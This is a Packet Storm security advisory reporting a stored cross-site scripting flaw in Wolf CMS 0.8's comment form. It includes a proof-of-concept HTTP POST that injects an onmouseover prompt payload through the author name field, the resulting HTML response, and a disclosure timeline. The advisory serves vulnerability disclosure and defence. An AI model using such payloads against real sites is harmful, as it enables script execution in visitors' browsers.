Wolf CMS 0.8 Cross Site Scripting

2016-10-09T00:00:00
ID PACKETSTORM:139038
Type packetstorm
Reporter Mattia Reggiani
Modified 2016-10-09T00:00:00

Description

                                        
                                            `[+] Title  
Wolf CMS 0.8 - Stored Cross-Site Scripting (XSS) Vulnerability  
  
[+] Credit  
Mattia Reggiani (info@mattiareggiani.com)  
  
[+] Advisory  
https://github.com/mattiareggiani/Security-Advisories/blob/master/MR-16-03_WolfCMS.pdf  
  
[+] Vendor Homepage  
https://www.wolfcms.org/  
  
[+] Affected Version  
0.8  
  
[+] Tested on  
Ubuntu Server 14.04, web server Apache 2.2.31  
  
[+] CVE  
N/A  
  
[+] Severity  
High  
  
[+] Summary  
Wolf CMS is an open source content management system which simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management. Wolf CMS is written using the MySQL / SQLite 3 / PostgreSQL database and the PHP programming language.  
Wolf CMS is prone to stored cross-site scripting (XSS) vulnerabilities, which could be used by malicious users to inject arbitrary JavaScript code in victim's browser.  
  
[+] Vulnerabilities  
[+][+] Stored Cross Site Scripting (XSS)  
# Description: Multiple stored XSS vulnerability has been found in HTTP Referer header. This can lead to arbitrary execution of code client-side (eg. Javascript).  
# Proof of Concept:  
>HTTP Request  
POST /wolfCMS/?about-us/sdgdfgdfsg.html HTTP/1.1  
[Headers]: ...  
[Post Data]:  
comment%5Bauthor_name%5D=%22+onmouseover%3Dprompt%28%221337%22%29+bad%3D%22&comment%5Bauthor_email%5D=xss%40xss.xss&comment%5Bauthor_link%5D=website&comment%5Bauthor_ip%5D=127.0.0.1&comment%5Bbody%5D=Test+2+Cross+Site+Vulnerability+%28XSS%29&commit-comment=Submit+comment   
  
>HTTP Response  
...  
<p> A <a href="http://website" title="" onmouseover=prompt("1337") bad="">" onmouseover=prompt("1337") bad="</a> <small class="comment-date"></small></p>  
...  
  
[+] Disclosure timeline  
# Discovery: 05/06/16  
# Vendor disclosure: 09/06/16  
# Vendor acknowledgment: N/A  
# Patch release: N/A  
# Public disclosure: 19/07/16  
`